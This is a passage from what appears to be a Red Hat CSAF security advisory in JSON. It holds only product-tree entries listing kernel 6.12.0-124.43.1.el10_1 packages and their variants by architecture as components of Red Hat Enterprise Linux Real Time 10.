"name": "kernel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.src as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src"
},
"product_reference": "kernel-0:6.12.0-124.43.1.el10_1.src",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch"
},
"product_reference": "kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
